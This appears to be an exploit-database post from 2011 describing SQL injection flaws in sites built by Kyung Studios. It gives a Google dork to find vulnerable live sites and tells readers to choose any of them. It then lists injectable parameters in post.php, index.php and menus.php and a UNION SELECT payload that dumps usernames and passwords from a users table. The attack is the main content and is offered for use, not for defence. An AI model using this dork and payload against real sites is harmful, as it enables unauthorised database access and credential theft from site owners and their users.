#(+)Exploit Title: Kyung Studios WebDesigners Database Disclosure vulnerability
#(+)Author   : ^Xecuti0n3r
#(+) Date    : 16.04.2011
#(+) Hour    : 13:37 PM
#(+) E-mail  : xecuti0n3r()yahoo.com
#(+) dork    : intext:"Site Design by Kyung Studios"
#(+) Category  : Web Apps [SQli]

____________________________________________________________________
____________________________________________________________________

Choose any site that comes up when you enter the dork intext:"Site Design by Kyung Studios" in search engine


    *SQL injection Vulnerability*
	

#	[+]http://site.com/post.php?id='17
#	[+]http://site.com/post.php?id=[SQLi]


#	[+]http://site.com/index.php?page='ex_upcoming
#	[+]http://site.com/index.php?page=[SQLi]


#	[+]http://site.com/menus.php?menu='horsdoeuvres
#	[+]http://site.com/menus.php?menu=[SQLi]


POC : http://www.site.com/post.php?id=1+union+select+1,concat(username,0x3a,password),3,4,5,6+from+users


Well there are a lot more .. just use the dork filetype:php ;) .. 

____________________________________________________________________
____________________________________________________________________

########################################################################
(+)Exploit Coded by: ^Xecuti0n3r 
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
########################################################################